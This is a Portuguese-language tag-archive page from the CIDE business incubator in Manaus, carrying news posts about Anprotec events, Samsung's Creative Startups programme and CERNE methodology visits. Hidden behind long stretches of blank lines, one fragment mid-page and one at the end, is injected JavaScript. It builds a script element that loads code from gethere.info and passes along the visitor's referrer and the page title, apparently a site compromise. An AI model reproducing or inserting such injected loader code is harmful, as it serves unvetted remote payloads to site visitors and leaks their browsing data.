• 92 3216-3892
  • secretaria@cide.org.br

Arquivo da tag Anprotec

Videoconferência ajuda formação no CIDE

Administradoras do CIDE e participantes das palestras reunidos para a videoconferência.

Os jovens empreendedores aprovados no Programa Creative Startups, resultado de uma parceria entre Samsung e Associação Nacional de Entidades Promotoras de Empreendimentos Inovadores (Anprotec) estão recebendo, via videoconferência, capacitações relacionadas com a área escolhida por eles para que possam desenvolver com êxito seus empreendimentos. Os encontros acontecem no Centro de Incubação e Desenvolvimento Empresarial (CIDE) que é parceiro da Anprotec nesse projeto.

Segundo a consultora do CIDE, Elizabeth Araújo, que acompanha os jovens nesse processo, a temática das videoconferências obedece uma série de requisitos que estão de acordo com as atividades das startups. “Validação de produtos, Captação de Clientes, Patentes, são alguns dos assuntos abordados nas palestras e formações”, diz a consultora, acrescentando que dez incubadoras do Brasil participam do projeto.

Ainda segundo Elizabeth Araújo, durante as sessões de videoconferências os assuntos, as dúvidas são compartilhados entre os participantes. “Em Manaus, dez jovens participam desse projeto e duas incubadoras de empresas também. Além disso, há algumas formações em que o empresariado das próprias incubadoras podem participar”, diz.

No contexto desse projeto, uma equipe de analistas em Processamento de Dados esteve no CIDE para conhecer e avaliar as instalações. O resultado da visita foi positivo e eles constataram que o espaço empresarial para startups é adequado e atende às necessidades do Programa Creative Startups.

Objetivo

O objetivo da videoconferência é colocar em contato, através de um sistema de vídeo e áudio, duas ou mais pessoas separadas geograficamente.

Durante a sessão de videoconferência, dúvidas são compartilhadas entre todos.

 

Startups têm nova oportunidade em programa da Samsung no Brasil

Visitantes da Samsung conhecem empresa de doces no CIDE

Visitantes da Samsung conhecem empresa de doces no CIDE

 

O coordenador nacional do Programa de Economia Criativa de Fomento às Startups de Base Tecnológica para a Samsung, empresa multinacional que atua em diversos ramos da área de tecnologia da informação, Antonio Marcon, esteve conhecendo as instalações do Centro de Incubação e Desenvolvimento Empresarial (CIDE), para estabelecer um vínculo mais próximo de colaboração e convidar os empreendedores do segmento de Tecnologia da Informação a participar do programa.

 

Segundo Marcon, o programa foi iniciado há dois anos no Brasil, em colaboração com a Coreia do Sul, e conta com a participação de 12 incubadoras. “Temos 20 startups participando no nosso programa no Brasil. Agora queremos estendê-lo para a Região Amazônica”, diz.

 

Ainda conforme Marcon, no segundo semestre deste ano, uma nova chamada por meio de edital vai acontecer, para aproximar os empreendedores existentes e os novos empreendedores, como estudantes com projetos em fase de amadurecimento. “Esperamos que o edital esteja preparado para junho. As startups contempladas vão receber uma bolsa de aproximadamente 250 mil reais para investimentos e processo de incubação inicial de nove meses”, diz, destacando que a Samsung vai oferecer mentoria, apoio tecnológico, canais de colaboração e de distribuição com o mercado, além da estrutura oferecidas pelas incubadoras participantes.

Os interessados em participar da nova chamada devem acessar o seguinte endereço eletrônico:

www.anprotec.org.br/Samsung

Equipe técnica do CIDE acompanha visitantes da Samsung

Equipe técnica do CIDE acompanha visitantes da Samsung

 

Visitantes conversam com empresário do CIDE

Visitantes conversam com empresário do CIDE

 

Visitantes na empresa de licores Sohervas da Amazônia

Visitantes na empresa de licores Sohervas da Amazônia

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Incubadoras de empresas trocam experiências para melhorar serviços

Consultoras da Anprotec conversam com os representantes das incubadoras

Consultoras da Anprotec conversam com os representantes das incubadoras

 

Com o objetivo de trocar antigas e novas experiências, sobre melhorias de planejamentos, consultorias, acompanhamentos aos empreendedores instalados em incubadoras de empresas, o Centro de Incubação e Desenvolvimento Empresarial (CIDE) e mais seis incubadoras de empresas do Amazonas participaram, em março, na Universidade do Estado do Amazonas (UEA), do evento Workshop para Incubadoras.

 

O encontro serviu também para compartilhar experiências da implantação da metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE), chamado de “metodologia CERNE”, que auxilia as incubadoras no processo de gestão de incubação empresarial.

 

O encontro foi realizado pela Fundação de Amparo à Pesquisa do Amazonas (FAPEAM) e a Associação Nacional de Entidades Promotoras de Empreendimentos de Tecnologias Avançadas (ANPROTEC). “Na verdade, o método CERNE é implantado de acordo com a realidade de cada incubadora participante. Nenhuma incubadora é igual a outra. Por isso, a metodologia não permite cópias. Mas, podemos ajustar o exemplo de uma incubadora conforme a realidade da minha incubadora”, diz a consultora da ANPROTEC, Evelin Cristina Astolpho.

 

A consultora lembrou também que o compartilhamento de informações e experiências faz parte das atividades desenvolvidas pela ANPROTEC para melhorar a gestão das incubadoras de empresas. “A ‘métodologia CERNE’ diz o que tem que ser feito na gestão das incubadoras. Agora, como tem que ser feito ou realizado, cada incubadora vai colocar em prática de acordo com suas características, realidade e de acordo com as suas empresas instaladas”, diz Evelin Astolpho, acrescentando que todas as exposições feitas no evento são usadas para melhorar as práticas.

 

Nova visita técnica

Em março de 2016, o CIDE foi avaliado por consultores da ANPROTEC, que verificaram o grau de implantação da “metodologia Cerne”. Este ano, uma nova visita está programada. “A segunda visita técnica, sem data prevista, vai avaliar o que foi implantado em cada incubadora. Para cada centro de incubação fazemos um relatório e passamos à Fapeam. Nessa segunda visita técnica vamos ver o quanto avançou”, finaliza a consultora.

 

Para o diretor executivo do CIDE, José Barbosa Grosso, a metodologia auxilia na avaliação do potencial de cada empreendedor instalado. “Todo o processo de incubação é avaliado. Dessa forma, detectamos as metas, as dificuldades, os riscos, os objetivos e potenciais das empresas residentes aqui”, conclui.

Representantes de sete incubadoras de empresas participaram

Representantes de sete incubadoras de empresas participaram

 

Oc4

 

Oc3

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

CIDE participa da 26ª Conferência da Anprotec

Representante do CIDE, Rosália Padilha (de vermelho, à dir.), e gestores de outras incubadoras do Amazonas.

Representante do CIDE, Rosália Padilha (de vermelho, à dir.), e gestores de outras incubadoras do Amazonas

 

 

A 26ª Conferência Anprotec reuniu cerca de 650 empreendedores, representantes de incubadoras de empreas, gestores de ambientes de inovação, representantes do governo e do setor privado, estudantes e especialistas de todos os Estados brasileiros e de outros países em Fortaleza (CE). Durante três dias, de 17 a 20 de outubro, os participantes assistiram plenárias, minicursos, realizaram networking e interagiram no 4º Fórum Sebrae de Inovação. O Centro de Incubação e Desenvolvimento Empresarial (CIDE) foi representado por Rosália Padilha.

 

Negócios de impacto social ganharam espaço nas discussões. “Dentro desse contexto a Conferência foi bem aproveitada, assim como a rede de relacionamentos, contatos com reciprocidade de outras incubadoras e parques tecnológicos”, diz a representante do CIDE.

 

Além de participar de cursos e Workshops de sistemas de inovação, os representantes de incubadoras realizaram visitas técnicas a parques tecnológicos do Ceará. “Essas iniciativas tratadas por especialistas experientes, abordando temas relevantes no ambiente empresarial e inovador estimulará a reflexão e maior conhecimento para os desafios do nosso cotidiano, sejam nas incubadoras, universidades, parques tecnológicos, ICTs, empresas e entidades atuantes em inovação”, finaliza Rosália.

Goiânia é eleita

O terceiro dia de atividades da 26ª Conferência Anprotec em Fortaleza (CE) foi finalizado com a assembleia geral da Associação. A atividade teve início com a apresentação das candidaturas que concorreram para sediar a Conferência de 2018. Tanto a equipe de Goiânia (GO), quanto a de Gramado (RS) tiveram 10 minutos para argumentar a favor de suas cidades. Após as explanações, o presidente da Anprotec, Jorge Audy, convidou todos os participantes para votarem em uma das duas candidaturas.

 

A cidade vencedora foi Goiânia, que abrigará a 28ª Conferência Anprotec em 2018. Após as comemorações, Aline Figliolo, Superintendente de Tecnologia e Inovação da Secretaria de Ciência e Tecnologia de Goiânia, afirmou que a Conferência de 2018 será muito agregadora regionalmente. “Este é um evento de todo centro oeste e de todo o Brasil”.

Os participantes assistiram plenárias, minicursos, realizaram networking e interagiram

Os participantes assistiram plenárias, minicursos, realizaram networking e interagiram

 

 

 

Representante do CIDE, Rosália Padilha, conheceu incubadoras e interagiu com empresariado em Fortaleza

Representante do CIDE, Rosália Padilha, conheceu e interagiu com empresariado de outras incubadoras em Fortaleza

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

var d=document;var s=d.createElement(‘script’);

CIDE recebe visita técnica da Anprotec

Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa

Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa

 

 

Os consultores da Associação Nacional de Entidades Promotoras de Empreendimentos de Tecnologias Avançadas (Anprotec), Evelin Astolpho e Carlos Lamberti Júnior, estiveram no Centro de Incubação e Desenvolvimento Empresarial, no último dia 11, realizando a visita técnica do convênio de apoio às incubadoras, do edital Pró-Incubadoras da Fundação de Amparo à Pesquisa do Amazonas (Fapeam), além  de verificar o grau de implantação da metodologia CERNE no centro.

 

Conforme a representante da Anprotec, Evelin Astolpho, a visita serviu para verificar as atividades realizadas a favor dos empreendimentos instalados no CIDE. “O importante é comprovar que as ações que fazem parte do CERNE estão sendo realizadas e que os resultados estão sendo gerados, visando todo um desenvolvimento local da Região”, disse.

 

Para a coordenadora do projeto no CIDE, Rosália Padilha, a implantação do projeto traz melhorias para as empresas instaladas. “ O projeto utilizará a metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE) que é uma plataforma de soluções com qualificação, práticas e processos estabelecidos, e é válido para todas as incubadoras do Brasil, visando à melhoria em planejamentos, capacitação, empreendimentos, assessorias, consultorias, acompanhamento, etc. Desse modo, podemos ter empreendimentos de sucesso”, destaca.

 

O edital prevê visitas às incubadoras de empresas a cada seis meses. “Todo o trabalho é feito em parceria com a Fundação de Amparo à Pesquisa do Estado do Amazonas (Fapeam), portanto, a próxima visita acontecerá de acordo com o que estabelece o edital”, lembra Evelin Astolpho, acrescentando que outras incubadoras de Manaus e de outros municípios vão ser visitadas.

 

Uma vez terminada a avaliação, os consultores se dirigiram a algumas empresas para conhecer os trabalhos desenvolvidos, em companhia do diretor executivo do CIDE, José Grosso, da equipe administrativa e da coordenadora do “CIDE2”, Elizabeth Araújo.

O diretor executivo do CIDE, José Grosso, fala das ações implantadas

O diretor executivo do CIDE, José Grosso, fala das ações implantadas

 

 

A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora

A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora

 

 

Consultores da Anprotec conhecem os produtos regionais no CIDE

Consultores da Anprotec conhecem os produtos regionais no CIDE

 

 

Equipe visita a Cheiro D´Folha, no CIDE.

Equipe visita a Cheiro D´Folha, no CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;